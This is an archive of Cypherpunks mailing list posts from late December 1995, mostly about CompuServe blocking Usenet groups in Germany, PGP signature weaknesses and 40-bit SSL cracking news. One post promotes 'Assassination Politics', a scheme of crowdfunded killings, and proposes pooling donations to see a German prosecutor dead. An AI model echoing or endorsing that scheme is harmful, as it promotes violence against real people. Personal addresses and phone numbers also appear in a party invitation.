By/yU2M5s9y7ZJ1rn4coasx/J4ar/SNLgxFNPV+buL5v3UFLzmmUwWzryCH6pIkB 5PShfQ1BqD7MI4juwKjWGw+fgZraJfScb2zKYk01E6brFPObNGdMAZ0P8lFqtkub VdYyAneCtc+F6xeU5lRSGhysJWE+PwkwgKKhQX6h1zwMlhLQXX5t1kSnsezzqPzZ /C+Bgt2BGQYPoDH9Gpc8GXQENpDRx3Lh8dhlNDlNAEDxKva03Ij30A== =RLCm -----END PGP SIGNATURE----- From tcmay at got.net Fri Dec 29 16:25:58 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 30 Dec 1995 08:25:58 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: Wow! I am watching the CEO of Compuserve being interviewed on CNBC, explaining how his company is "taking the high road by complying with the laws of Germany" in removing access to 200 Usenet groups. So, what happens with Saudi Arabia announces that Christian and Jewish newsgroups violate their laws (I don't know this for sure, but I know that Jewish and Christian temples and churches are strictly verboten in Saudi Arabia). And, think of the many countries which ban homosexuality, and so on. An amazing cave. Massey seems to think that all of the other large ISPs will fall in line and remove "illegal" newsgroups (illegal in any country in which they have account holders). I wrote a longer post on the issues last night, so I won't repeat those points. --Tim May We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From hajo at quijote.in-berlin.de Fri Dec 29 16:35:44 1995 From: hajo at quijote.in-berlin.de (Hans-Joachim Zierke) Date: Sat, 30 Dec 1995 08:35:44 +0800 Subject: A weakness in PGP signatures, and a suggested solution (long) In-Reply-To: Message-ID: <5-oG4BKKYgB@quijote.in-berlin.de> -----BEGIN PGP SIGNED MESSAGE----- Dr. Dimitri Vulis writes: > I suggest to the kind folks working on PGP 3 that there should be a > standard protocol to include within the signed portion the information on > when and for whom this text is written: i.e. the list of e-mail recipients > and/or Usenet newsgroups, which could be easily compared with the RFC > 822/1036 headers of an e-mail/Usenet article. This assumes that every Usenet site uses RFC 822/1036 headers locally. This is no real-world assumption. And the clearsign problem can be solved with MIME only, since currently, the MIME 8-bit character set conversion will kill the validity of signatures, regardless whether being forged or not. Since I know this, I seldom use clearsigning. Quite simply, it does not work, and that's a more severe problem. If an error on signature validation is the normality, not the exception, the whole stuff does not make any sense. hajo -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Sig validation of clearsigned 8 bit text is uncertain. iQCVAwUBMORRda1Qa39mIA0ZAQELEAQAryOaVDZIhnYQETxhmHyJktRei3080gXV 77Oy5Qo3/WdO7cvFdR+CKytbZQlV7GHS4lQ+N0MCPHH79+vLnw8xvQ+3htkzerjF u6tgjiEnbR/YNCvjEq01aU2RVHgycg680WVOH4DqUNTi7yAY2G5Sc6K2LAD4AQrp toniWTWanyY= =+LZR -----END PGP SIGNATURE----- From lstewart at prisminc.com Fri Dec 29 16:45:21 1995 From: lstewart at prisminc.com (lstewart) Date: Sat, 30 Dec 1995 08:45:21 +0800 Subject: Housewarming/birthday party Message-ID: <9502157953.AA795307204@prisminc.prisminc.com> You're invited to celebrate Laura and Bill's New Home Bill's Birthday and anything else you'd like to celebrate! Date: Saturday, January 13 Time: 5:00pm (or whenever) Putative location: 2040 Rock Ave. #22, Mountain View, CA RSVP (acceptances): lstewart at prisminc.com, or Laura Stewart at work: 408-744-3359. What to bring: If you RSVP by Jan 12, don't bring anything! We'll provide something resembling dinner. If you don't RSVP, bring food or drink. You are welcome to bring your family or other guests, but please do not forward this invitation to other mail lists. Smoking is prohibited, laptop computers tolerated, board games warmly encouraged. How to get there (all directions are written as if 101 really went north and south): HOW TO FIND THE APARTMENT The address is 2040 W. Middlefield #22, but ignore that fact. It is much easier to find if you firmly believe that the address is 2040 Rock Ave. #22. From the corner of Rock & Rengstorff, follow the big lighted "2040" numbers along Rock. Just after the second driveway on Rock you will find a walkway into the complex...follow the walkway to #19, then climb the stairs to #22. HOW TO FIND THE CORNER OF ROCK & RENGSTORFF Cypherpunks: From La Castena (the burrito place), just go one block "west" on Rengstorff. From Highway 101 southbound: Take Rengstorff exit, which makes a 180-degree loop. Turn left onto Rengstorff westbound (away from the bay, toward the ocean). One block after Old Middlefield (and one block before Middlefield), turn left on Rock Ave and park on Rock. See above to find the apartment. From Highway 101 northbound: Ignore the Middlefield exit. Take Rengstorff exit, which makes a 270-degree loop and merges onto Rengstorff westbound (away from the bay, toward the ocean). One block after Old Middlefield (and one block before Middlefield), turn left on Rock Ave. and park on Rock. See above to find the apartment. From 680 at Dunbarton exit: Taking the Dunbarton bridge to 101 is a few minutes faster, but it's easy to get lost between the bridge and 101. Unless you're familiar with the area, we recommend taking 680 to 237, west on 237 to 101, and north on 101 to the Rengstorff exit, which makes a 270-degree loop and merges onto Rengstorff westbound (away from the bay, toward the ocean). One block after Old Middlefield (and one block before Middlefield), turn left on Rock Ave. and park on Rock. See above to find the apartment. Further complications..er, clarifications: Rock Ave. and Rock St. are the same thing. Middlefield Road and Old Middlefield Road are two different things. Middlefield Rock Old Middlefield 101 ^ | | | | | | | | | "North" | | | | the | | | | bay Rengstorff----------------------------------------------------- | _______ | | | | [ 2 ]| |La | | [ 0 ]| |Castena | | [ 4 ]| | | | [ 0 ]| | | | [_______]| | | | #22 | | | | | | | | | | | Lost on the day of the party? Call us at home: 415-938-1697. The price of condo living: There is no guest parking in the complex, and the party must end by 10pm. Please help us get along with our new neighbors by respecting the condo rules. Thanks! From jya at pipeline.com Fri Dec 29 17:01:36 1995 From: jya at pipeline.com (John Young) Date: Sat, 30 Dec 1995 09:01:36 +0800 Subject: CHU_chu Search Engines, Branded Communities Message-ID: <199512292107.QAA02245@pipe2.nyc.pipeline.com> 12-29-95. FinTimes: "Engine of the superhighway" muses on search engines and branded communities, and how their convergence will barb-wire lecher Tio Web from wild-legger Tia Juana. CHU_chu From corey at netscape.com Fri Dec 29 17:23:23 1995 From: corey at netscape.com (Corey Bridges) Date: Sat, 30 Dec 1995 09:23:23 +0800 Subject: Chinese Cypherpunk quote [NOISE] Message-ID: <199512300011.QAA16526@urchin.netscape.com> At 02:20 PM 12/29/95 +0100, Anonymous wrote: >The will of the people is the best law. Rrrr. Rrrrr... OKAY, I'm sure that's bait, but it's a (relatively) slow week here at Netscapegoat. (Besides, I've apparently already set a precedent for responding to tentacularly dangled carrots earlier this week with my response to the C'punk Seal question.) So I'm throwing better judgment to the wind and leaping straight for the soft pink throat of this taunt. To reply simply: Wrong -- the will of the people is as fickle as the wind. Follow the will of the people, and you run your country by following fads. Mob rule and all that. We're in deep trouble if we ever get a true democracy. Sorry. Just had to respond. -- MY opinions, thank you very much. Corey Bridges Netscape Communications Corporation home.netscape.com/people/corey Action figure #35: "Jeff Weinstein, with real asbestos suit and glow-in-the-dark magnetized target!" From jsw at netscape.com Fri Dec 29 17:55:01 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 30 Dec 1995 09:55:01 +0800 Subject: Netscape 40-bit cracking. The new computing benchmark? In-Reply-To: Message-ID: <30E488F1.1F51@netscape.com> Weld Pond wrote: They (ICE) say that they actually ran Hal's SSL challenge. I think the mention of DES must have been an error on the part of Infoworld. --Jeff > > From Infoworld Dec 25, 1995 page 3. > > Netscape Commerce Server Security Broken > > Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it > has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape > Commerce Server. Unlike a similar security break-in [talk about bad > terminology] by a French university student last August, which required > eight days, 120 workstations, and two supercomputers, ICE said it used a > computer that cost $83,000 and compromised the Wold Wide Web server's > security in 7.7 days. [Hey, what about the Cypherpunks crack that > only took 31.8 hours?] Netscape Communications Corp. officials were not > surprised by the security crack. "We've known that 40-bit encryption is > breakable since we shipped the server. That's the reason it's allowed to > be exported," said company spokeswoman Rosanne Siino. "We need to keep > lobbying to get rid of the U.S. governments 40-bit restriction on what > can be exported." Within the United States, Netscape sells products with > 128-bit encryption. -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From proff at suburbia.net Fri Dec 29 17:59:17 1995 From: proff at suburbia.net (Julian Assange) Date: Sat, 30 Dec 1995 09:59:17 +0800 Subject: Housewarming/birthday party In-Reply-To: <9502157953.AA795307204@prisminc.prisminc.com> Message-ID: <199512300046.LAA16884@suburbia.net> > The price of condo living: There is no guest parking in the complex, > and the party must end by 10pm. Please help us get along with our new ^^^^^ ^^^^ > neighbors by respecting the condo rules. Thanks! > Thats not a party. Thats an after-school tupperware get-together. Cheers, -- +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | has stood still, who built the largest | |EMAIL: proff at suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From byteback at ldd.net Fri Dec 29 18:18:48 1995 From: byteback at ldd.net (HousePasley) Date: Sat, 30 Dec 1995 10:18:48 +0800 Subject: (no subject) Message-ID: <30E49366.18EB@ldd.net> Talk to me..my son has shoes...cypher this... mays out of maggots, go arial. From sameer at c2.org Fri Dec 29 18:45:37 1995 From: sameer at c2.org (sameer) Date: Sat, 30 Dec 1995 10:45:37 +0800 Subject: Netscape 40-bit cracking. The new computing benchmark? In-Reply-To: <30E488F1.1F51@netscape.com> Message-ID: <199512300151.RAA00995@infinity.c2.org> ObPlug: Community ConneXion does not ship a 40-bit-crippled server. (Apache-SSL) > > surprised by the security crack. "We've known that 40-bit encryption is > > breakable since we shipped the server. That's the reason it's allowed to > > be exported," said company spokeswoman Rosanne Siino. "We need to keep -- sameer Voice: 510-601-9777x3 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From grendel at netaxs.com Fri Dec 29 19:36:23 1995 From: grendel at netaxs.com (Michael Handler) Date: Sat, 30 Dec 1995 11:36:23 +0800 Subject: Massey, CEO of Compuserve, on Internet In-Reply-To: Message-ID: On Fri, 29 Dec 1995, Timothy C. May wrote: > Wow! I am watching the CEO of Compuserve being interviewed on CNBC, > explaining how his company is "taking the high road by complying with the > laws of Germany" in removing access to 200 Usenet groups. A blatant lie. Newsgroups: alt.online-service.compuserve,comp.org.eff.talk From: tomklem at netcom.com (Tom Klemesrud) Subject: Re: Compuserve lies about the Germans Message-ID: [ ... ] Compuserve CEO Massey appeared on CNBC and said that Compuserve was only obeying the (German) law. However, the AP article makes it clear that there is no such German law--that there is only an investigation going on in Germany as th exactly what is on the internet. Compuserve was not asked to censor anything, according to the AP article. Compuserve has apparently used this episode as a excuse to do what it was already predisposed to do, in my opinion. [ end ] From: tc <72417.1514 at compuserve.com> Newsgroups: alt.online-service.compuserve,comp.org.eff.talk Subject: Re: Compuserve lies about the Germans Message-ID: <4c222o$jc3 at dub-news-svc-4.compuserve.com> CompuServe is starting to look worse and worse in this thing. I'm still waiting for the real story. Here is an excerpt from a story on the AP: Munich prosecutor Manfred Wick confirmed Friday that Bavarian state police investigators searched CompuServe's networks and computers last month for child pornography, but he would not say what they found. "We didn't threaten them with charges," Wick said. Arno Edelmann, a CompuServe product manager in Unterhaching, Germany, said Friday that the company blocked access to 200 sex-oriented newsgroups in a portion of the Internet called Usenet. "It is perhaps an overreaction but we want to cooperate with the Bavarian prosecutor's office," Edelmann said. [ end ] And herein lie the pitfalls of trying to establish a global ISP presence. I'm with Tom Klemesrud on this one. CI$ is trying to lick some boots to get a position as a _capo_ when Der Revolution begins. Michael, rec.arts.erotica and soc.support.youth.gay-lesbian-bi moderator (both banned by CI$). As far as I'm concerned, CI$ is no longer welcome to any articles from my group; I'll mangle the Path: header as necessary to insure they never get there. -- Michael Handler From jimbell at pacifier.com Fri Dec 29 20:02:58 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 30 Dec 1995 12:02:58 +0800 Subject: "Deterrence" Message-ID: In the 1960's movie, "Dr. Strangelove," the title character defined "deterrence" as being "the art of making your enemies FEAR to attack you." As has been well-publicized recently, pressure from a German prosecutor had induced Compuserve to cease access to a number of sex-related Internet groups. Clearly, neither Compuserve nor its users nor the Internet community in general has demonstrated adequate DETERRENCE to him or people in his position. In my essay, "Assassination Politics," I pointed out that it would be relatively easy to deter such official-type actions if enough of us simply said, "NO!" and denominated it in terms of dollars and cents. After all, with four million Compuserve users, if they each were willing to donate a penny to see this latter-day Fuhrer dead, that would be $40,000. (Pardon me if I don't translate this into marks and other currencies.) In practice, of course, if such a system were in place, it is highly unlikely that he would have even dared try to put pressure on Compuserve, and Compuserve wouldn't have dared respond cooperatively to such outrageous influence. It is worth noting that if six million Jews had been willing to donate a dime each in 1932 to see Hitler and his cronies dead, much of the late thirties and forties would have ended up quite differently. Some may argue that today's situation isn't nearly as serious now as it was then, but then again, the situation probably didn't really look very serious in 1932, did it?!? WHEN, exactly, would it be appropriate to act? From dlv at bwalk.dm.com Sat Dec 30 12:30:22 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sat, 30 Dec 95 12:30:22 PST Subject: last straw In-Reply-To: Message-ID: Dave Del Torto writes: > I've decided to cancel my CrampuNerve account and send the weasels a msg to > telling them why. I encourage everyone here to do the same with your CI$ > account (if you still have one). These [insert colorful expletive here]s > only understand one thing: cold ca$h. Thus, the only effective way to send > them an indication of one's displeasure at their poor precedent-setting is > to vote with one's wallet. One could go one step further -- use free trial accounts to go to their local boards and chat rooms and tell the truth, uring others to leave. By the way, Cantor & Siegal were long-time CompuServe users before spamming Usenet with their green card ad. > Any who are still unfortunate enough to rely on CI$ for Internet/Usenet > access are getting reamed price-wise anyway, not to mention suffering poor > reliability and now access, so maybe a few of them could also take this > opportunity to migrate to an ISP with some real "backbone." A friend of mine tried to use CS to read Usenet and reported the following: * There's a very small limit on the size of an article to post to Usenet; * There's a tremendous delay before Usenet articles pass through their gateway; * He saw many articles at other sites that never made it to CS; he estimated that about 30-50% of Usenet articles just never get thru; * The expiration in many high-volume newsgroups is 3 days or less. (I don't know how true this is; his impressions may be wrong.) When he complained to CS about it, he was told that CS doesn't position itself as an Internet service provider. They have a lot of proprietary content that's not available via the internet. They don't expect people to use their services to use Usenet or Internet e-mail. And now comes the *point*: There's much information on CompuServe that cannot be accessed from the outside. One example is the very informative National Computer Security Association's forum. I think it would be a fitting response if NCSA removed their forum from CS. (There are other such for-pay forums, like SovSet', which can be accessed from the internet without paying anything to CompuServe). As it stands, there are people who will maintain their CS accounts to access the NCSA forum (even though they find CS's actions repugnant). If you don't like it, encourage the NCSA to move their forum elsewhere. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From joelm at eskimo.com Fri Dec 29 20:33:12 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sat, 30 Dec 1995 12:33:12 +0800 Subject: Internet wiretap? Message-ID: <199512300409.UAA28915@mail.eskimo.com> This tidbit was posted a few hours ago on c|net (12/29 4:00 PST). Thanks to a wiretap on the Internet, three people have been arrested for illegally selling and manufacturing cellular phone equipment and electronic devices over the Internet, according to Secret Service agent Brian Gimlett. This is the first time the Secret Service and the Drug Enforcement Administration were allowed to wiretap via the Internet, says Gimlett. The rest of the story talks about an exchange of e-mail discussing the sale of various nasty cellular accessories. There is no information on exactly what "wiretap" means or any other technical details. Interesting to note the DEA was in on it. Crypto-relevance only if the perps were using a remailer (which I kind of doubt). Full story (quite short), at: http://www.cnet.com/Content/News/Files/0,16,326,00.html Joel From rsalz at osf.org Fri Dec 29 20:59:44 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 30 Dec 1995 12:59:44 +0800 Subject: http://www.gsa.gov/irms/ki/sipmo.htm Message-ID: <9512300421.AA23481@sulphur.osf.org> As many of you probably already know, the US Postal Service is creating a national public-key infrastructure for individuals (I've never heard any mention of Corporate identities, not to say that there won't be any). A few weeks ago the General Services Agency of the US Gov't had an open working session of their Security Infrastructure Program Management Office (SIPMO). At that session they announced a pilot program for electronic filing of federal tax returns, using the USPS infrastructure. The URL in the subject line has not yet been updated to discuss the pilot; right now it is basically an overview of SIPMO. Anyone know more? /r$ From ravage at ssz.com Fri Dec 29 21:05:55 1995 From: ravage at ssz.com (Jim Choate) Date: Sat, 30 Dec 1995 13:05:55 +0800 Subject: January meeting (fwd) Message-ID: <199512300442.WAA01350@einstein> Hi all, Please make the date Saturday January 6, not Sunday January 7. Forwarded message: > From ravage at ssz.com Fri Dec 29 22:41:13 1995 > From: Jim Choate > Message-Id: <199512300441.WAA01326 at einstein> > Subject: January meeting > To: austin-cpunks at ssz.com (Austin Cypherpunks) > Date: Fri, 29 Dec 1995 22:41:11 -0600 (CST) > Cc: cypherpunks at toad.com > X-Mailer: ELM [version 2.4 PL23] > Content-Type: text > Content-Length: 373 > > > Hi all, > > Just a reminder that the next general meeting will be held on January 7, > 1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd. > > We will be discussing further issues related to the video and setting a > schedule of meetings and deadlines for various production points. > > Hope to see you folks there! > > Jim Choate > > From danielguerard at accent.net Fri Dec 29 21:21:51 1995 From: danielguerard at accent.net (daniel guerard) Date: Sat, 30 Dec 1995 13:21:51 +0800 Subject: (no subject) Message-ID: <199512300455.XAA29856@server0.accent.net> please, mail list of server. Tank you From erc at dal1820.computek.net Fri Dec 29 22:28:32 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Sat, 30 Dec 1995 14:28:32 +0800 Subject: Zensoren ueber Alles In-Reply-To: <199512300548.AAA02407@pipe8.nyc.pipeline.com> Message-ID: <199512300604.AAA05518@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- This "Tall Paul" fellow said: > Based on other news reports, I conclude that CompuServe lied in both areas. So? Companies lie all the time - the bigger the company, the bigger the lie, in my experience. Companies are like governments - they will get away with what they can until caught. Even then, they rarely stop - it just goes undercover. > It did none of these things. It cut off all customers to an enormous number > of groups. It inferrentially violated property rights (i.e. contracts) to > customers promised internet access and now provided only a crippled version > thereof. And it lied about the whole thing. Again, so? All that it will do is to drive people away from Compu$erve into the arms of other service providers. Maybe some of them will even figure out what a *real* ISP is... - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOTWTyS9AwzY9LDxAQH+OwQApSgooUc/ZgQgQm5xn1v4YxmI5jcVoJfR b5pBCnJvcvTBld5C/6tTuOyqpnEvJD/oBlT+buhQDinvLYD97Z3oh65weEAZNrJ0 x2iTz1NzilPB5EDawIPs4lTELFaJLLdPVKZvgPaqhoUum3Sm3uHvgL1HcvnR+vt0 5hZW/NGlF4M= =p6vI -----END PGP SIGNATURE----- From sandfort at crl.com Fri Dec 29 22:58:38 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 30 Dec 1995 14:58:38 +0800 Subject: DIBS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Eric Hughes and I are calling dibs for the FEBRUARY Cypherpunks meeting. On February 10, we will host the meeting at our offices in downtown San Francisco (easily accessible by BART and Muni). More details later. After the meeting, I will be hosting a gala costume party in the large, elegant Oakland house owned by two of my co-hosts. I will soon be setting up an invitation on a web page provided another co-host, C'punk hero-of-the-revolution, Sameer. Stay tuned. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From exabyte!mikej2 at uunet.uu.net Fri Dec 29 23:53:34 1995 From: exabyte!mikej2 at uunet.uu.net (Mike Johnson second login) Date: Sat, 30 Dec 1995 15:53:34 +0800 Subject: DOS - MD5 - Thanks In-Reply-To: <199512282039.PAA21627@universe.digex.net> Message-ID: A freestanding implementation of MD5SUM (compiled from that in the PGP distribution) for DOS is at ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS at 303-772-1062. I suggested to Phil Zimmermann that he should put this in the next PGP release along with the compiled DOS version of PGP, but there hasn't been a new release of PGP since then. Happy New Year! Mike Johnson mpj at exabyte.com #include From futplex at pseudonym.com Sat Dec 30 01:23:09 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 30 Dec 1995 17:23:09 +0800 Subject: blind validation In-Reply-To: <199512281849.MAA08259@proust.suba.com> Message-ID: <199512300908.EAA07360@opine.cs.umass.edu> Alex Strasheim writes: [discussion and assumptions liberally elided] > 1. Alice initiates a transaction with Bob. (Perhaps by asking > him for a file.) > > 2. Bob generates a random number and sends it back to Alice. > > 3. Alice blinds Bob's number and sends it to Trent, along with > proof of her validatability. > > 4. Trent checks Alice's proof, signs the blinded number, and > then returns it to Alice. > > 5. Alice unblinds Bob's number, then sends it to Bob. > > 6. Bob checks Trent's signature and makes sure that the number > he recieved matches the one he sent out. Then Bob processes > Alice's transaction. > > If Bob always follows this protocol, he can prove to Sam that > he's followed the law. Alice remains anonymous. Alice can still > transfer the file, but she has to give it away herself: she > can't give away the ability to get it directly from Bob without > giving away the ability to prove Aliceness to Trent. I'm not convinced that your last point is true. It appears that the signed Bobnet-access-number is still just a transferrable ticket. Charlie can place an order with Bob, forward the Bobnet-access-number to Alice, wait for Alice & Trent to do the blinding & signing tango, forward the signed Bobnet- access-number to Bob, and get the goods from Bob. Charlie can't use the signed Bobnet-access-number to prove to Trent that he's Alice. In fact, since it's unblinded, Charlie can't even prove that he's linked to a particular validation performed by Trent. (If Alice foolishly gave him the blinded version too, he could show that he shares Alice's knowledge about this validation.) [...] > The main problems that I can see with this protocol are: > > 1. It's vulernable to traffic analysis. > 2. Sam has to trust Trent, which he may be unwilling to do. > 3. You can infer stuff about Alice from the kinds of requests > she makes of Trent. Someone who always asks Trent for proof > that he's not a felon might tag himself as a person who buys > a lot of guns or ammunition, for example. 3. is OK as long as Alice trusts Trent. The trick is selecting a Trent trusted by both Alice and Sam ;) -Futplex From Ulf_Moeller at public.uni-hamburg.de Sat Dec 30 03:50:09 1995 From: Ulf_Moeller at public.uni-hamburg.de (Ulf Moeller) Date: Sat, 30 Dec 1995 19:50:09 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause Message-ID: >Thus, it is the government of Germany in this case which is "censoring." This is today's page 1 article in the newspaper "die tageszeitung". The article "Zensur im Cyberspace" (censorship in cyberspace) and the comment "Die Moral der Biederm�nner" are available http://www.prz.tu-berlin.de/~taz until tomorrow. From the article (my translation): "The Bavarian department of public prosecution 'has left it to their discretion' to take the 'necessary steps' on their own, to avoid 'possible punishability of the management in Germany'. An advice that CompuServe has followed although there is no kind of legal obligation for it. Legally, it is still perfectly unclear if enterprises that provide access to the Internet can be held responsible in any way for the contents distributed there." From the comment by Niklaus Haubl�tzel: "Reality cannot be outlawed, only improved, and many still hope that complete freedom of information and opinion in computer networks can contribute to that. But the company of CompuServe does not seem to be interested in that. They only want their customers' money, but not their freedom. [...] Like any censorhip, this one comes with hipocrisy. Towards their paying customers, CompuServe claims to have been forced by German prosecutors. Thus one lie creates another. That they were forced it out of the question. It is only in dictatorships that the prosecutors judge the defendants - that is why dictatorships need censors." From junger at pdj2-ra.F-REMOTE.CWRU.Edu Sat Dec 30 05:28:20 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Sat, 30 Dec 1995 21:28:20 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: Michael Handler writes: : On Fri, 29 Dec 1995, Timothy C. May wrote: : : > Wow! I am watching the CEO of Compuserve being interviewed on CNBC, : > explaining how his company is "taking the high road by complying with the : > laws of Germany" in removing access to 200 Usenet groups. : : A blatant lie. [Material deleted] : CompuServe is starting to look worse and worse in this thing. I'm : still waiting for the real story. Here is an excerpt from a story on the : AP: : : : Munich prosecutor Manfred Wick confirmed Friday that Bavarian state : police investigators searched CompuServe's networks and computers last : month for child pornography, but he would not say what they found. : "We didn't threaten them with charges," Wick said. : Arno Edelmann, a CompuServe product manager in Unterhaching, : Germany, said Friday that the company blocked access to 200 : sex-oriented newsgroups in a portion of the Internet called Usenet. : "It is perhaps an overreaction but we want to cooperate with the : Bavarian prosecutor's office," Edelmann said. : : [ end ] : : And herein lie the pitfalls of trying to establish a global ISP : presence. : One should also notice that Bavaria is only one state in the German Federal Republic; this case is more like Texas investigating Compuserve than the United States federal government investigating Compuserve. Bavaria is the stronghold of what can properly be called the (Catholic) Religious Right in Germany. It should also be noticed that in general German publications and television seem to be less constrained in publishing materials that in the United States would be called ``indecent'' by some than are United States publications and broadcasters. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From ddt at lsd.com Sat Dec 30 07:51:51 1995 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 30 Dec 1995 23:51:51 +0800 Subject: last straw Message-ID: I've decided to cancel my CrampuNerve account and send the weasels a msg to telling them why. I encourage everyone here to do the same with your CI$ account (if you still have one). These [insert colorful expletive here]s only understand one thing: cold ca$h. Thus, the only effective way to send them an indication of one's displeasure at their poor precedent-setting is to vote with one's wallet. Any who are still unfortunate enough to rely on CI$ for Internet/Usenet access are getting reamed price-wise anyway, not to mention suffering poor reliability and now access, so maybe a few of them could also take this opportunity to migrate to an ISP with some real "backbone." CI$ is becoming redundant and now they're making themselves unappealing. Convenient, economical dialups are now available to Europeans and any of us Yanks who have to travel to Europe regularly through various non-anus-kissing ISPs (xs4all, iSYS, etc.). Back in '90-'92 CI$ used to be somewhat handy when travelling to Europe, but even then it was horribly expensive when you tallied up their "surcharges" for dialing in through Frankfurt, etc. Good riddance, say I. dave ____________________________________________________________ "I prefer a real whorehouse to The Theatre." -Dorothy Parker From dlv at bwalk.dm.com Sat Dec 30 08:46:03 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 00:46:03 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu> Message-ID: <94HXgD17w165w@bwalk.dm.com> "E. ALLEN SMITH" writes: > From: IN%"vznuri at netcom.com" "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58 > > >= the list charter can ask for people to submit to various practices on > the honor system, such as not using pseudonyms. cryptoanarchists who > hate the idea of trust are of course going to object to the honor system, > because "that which cannot be enforced should not be prohibited". > ---------------- > Does this last idea leave much doubt in anyone's mind that "Vladimir Z. > Nuri" is a Detweiler tentacle? Yes. I've exchanged several e-mails with LD. LD is much smarter. (Unless he's playing dumb... :) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Dec 30 08:49:17 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 00:49:17 +0800 Subject: easy avoidance of PGP signature forgeries and reuse In-Reply-To: Message-ID: attila writes: > I never paid much attention to the problem other than to avoid > it by forcing it --i.e. list the destination and the send inside the > signature block, thus: > > ----------------- BEGIN PGP SIGNED TEXT > > To: john doe > Newsgroups: sci.crypt > From: jane roe > Subject: that's all folks! ... Good - that's just what I've proposed :). However right now the overwhelming majority of people who PGP-sign their writings, don't include a copy of the headers within the signed portion. Those few who do, all seem to use different formats, so the signed headers cannot be easily compared to the headers in the actual envelope by a program. I propose a format below. > with e-mail, e-letters, direct faxes, etc. it is to easy to > ignore the courtesy header. From a standpoint of security, you have > blown away each of the attacks outline in your article in so much as > the signature will not compute if the courtesy block is omitted. I totally agree; that's why I propose copying that info in the signed portion "by default". > personally, I do not think PGP 3 should attempt to solve the > problem. Most of the headers involved are applied _after_ the message > leaves the mail program; and, PGP interfaces are virtually the same > as invoking an alternate editor, which gets you nothing. I don't think that a protocol for signing headers that requires mime/multipart is going to be widely used, especially for Usenet postings. I've thought about it and came up with the following idea for the syntax: ----BEGIN PGP SIGNED MESSAGE---- some text ----BEGIN PGP SIGNED HEADERS---- From: address [all these are optional] To: address[,address]... Newsgroups: group[,group]... Date: rfc 822 date Subject: subject ----BEGIN PGP SIGNATURE---- Version 2.6.2 12341234... ----END PGP SIGNATURE---- The "signed headers" portion may contain the following optional fields: From: address -- the address associated with the key used to sign this message To: address[,address]... -- addresses (user at host, no names) of the recipients in RFC 822 To: and Cc: headers (not the Bcc: recipients). Addresses mangled by various gateways shouldn't verify. Newsgroups: group[,group]... -- the newsgroups from the RFC 1036 header Date: and Subject: -- should match the header The sequence of events would be: * pick the addressees and the newsgroups + compose the text * sign the signed portion * post/e-mail the result to the specified addressees/newsgroups. (Of course, the poster could lie and claim in the signed portion that the article is being posted to alt.sex.pedo when he himself posts it to misc.kids:) If a standard like this catches on, and is integrated into PGP-aware news/e-mail programs, then it's a simple exercise to write a little script to look for BEGIN PGP SIGNED HEADERS and compare the information inside it with the RFC 822/1036 headers outside the signed portion of the message. It could be done within PGP too. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 